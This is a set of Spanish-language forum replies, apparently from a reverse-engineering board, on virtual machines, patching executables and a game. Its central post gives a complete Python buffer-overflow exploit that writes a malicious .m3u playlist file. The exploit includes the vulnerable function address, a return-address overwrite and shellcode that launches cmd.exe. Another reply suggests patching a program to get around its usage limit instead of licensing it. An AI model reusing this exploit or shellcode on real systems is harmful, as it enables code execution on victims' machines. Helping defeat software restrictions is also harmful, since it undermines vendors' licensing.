Si la usa.

La aplicación que hace el cifrado, corre en Windows?

Si hablas de un micro de 8bits: es un PIC? qué pic es? puedes dumpear el binario?

Una vez que creas un VM, digamos un Windows XP SP3, después es sólo cuestión de duplicar la VM tantas veces como te lo permita el disco y listo.

Al menos así es en VMWare. No estoy seguro de si puedes "levantar" varias VMs usando la misma imagen en disco...

Saludos!

Creo que soy de Argentina... 

Creo que ahí tienes el error!!! 

PD: Maldita traducción automática ????

Hola!

Fijate este post si te sirve: http://foro.elhacker.net/ingenieria_inversa/tutorial_usar_cheat_engine_para_modificar_juegos_inyeccion_de_codigo-t382181.0.html

PD: Te recomiendo ir a la escuela (nuevamente si ya has ido) porque tu escritura es horrible. Que uses este tipo de escritura en un chat no significa que pueda usarse en todos lados. 

Saludos!

Si VirtualBox o VMWare. No es necesario abrir varias instancias de la maquina virtual, porque puedes tener mas de 1 abierta (tantas como te permita tu PC).

Ahora, correr varias VMs solo para poder ejecutar un programa varias veces, es una solucion al problema, pero no la que considero optima. Si quieres abrir el programa varias veces, por una limitacion del mismo: no convendria tratar de "vencer" la limitacion antes? Es una limitacion que se puede quitar, aunque sea comprando una licencia?

Entiendo.

Ahora, tienes alguna idea de cómo programar en VB (6.0 o .NET) ?

Porque si sabes dónde está instalado el software (me refiero a la ruta) es muy sencillo modificar el ejecutable existente o bien reemplazarlo usando código. Es cuestión de saber programar. No existe un "comando mágico" que haga lo que quieres. Deberás hacer un pequeño programa que haga lo requerido o bien, usar un patcher genérico, como por ej. Dup2.

En VB 6 es cuestión de usar Open. En .NET no he programado casi nada, pero deberia ser algo parecido.

Saludos!

OK, me bajé el programa y lo estuve mirando. Aparte, bajé el video y también lo miré.

Aunque no tengo el tutorial que estás siguiendo, te puedo dar la siguiente info:

La función vulnerable es la que comienza en 41E2B0. Usa Olly y ponle un BP ahí. Cuando pare, vas poder ver la dirección de retorno de la función en el stack. Esa es la dirección que se va a pisar.

Ahora, si pones un BP al final de la función (en 41E9EC) vas a ver el valor al cual está intentando retornar y así vas a poder ver porqué se está rompiendo tu exploit.

Ahora, hice pruebas en XP SP3 EN y el siguiente exploit anda bien (en python):

import os
import struct
 
def main():
    file1 = "exploit.m3u"
    junk = "\x41" * 26099
    eip= struct.pack('<L', 0x01cef23a)
    shellcode = "\x90" * 25
    shellcode += "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65\x78\x65"
    #shellcode += "\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66\xf3\x07"
    shellcode += "\x90" * 25
    f = open(file1, "wb")
    f.write(junk + eip + shellcode)
    f.close()
    print("exploit created successfully");
 
if __name__ == '__main__':
    main()
 

Fíjate que hay algunos cambios en los valores originales (en junk). El shellcode que estás usando está comentado porque no me funciona en este SO, pero he agregado uno que debería funcionar bien.

Saludos!

A mi me gusta Team Fortress 2, aunque es por Steam...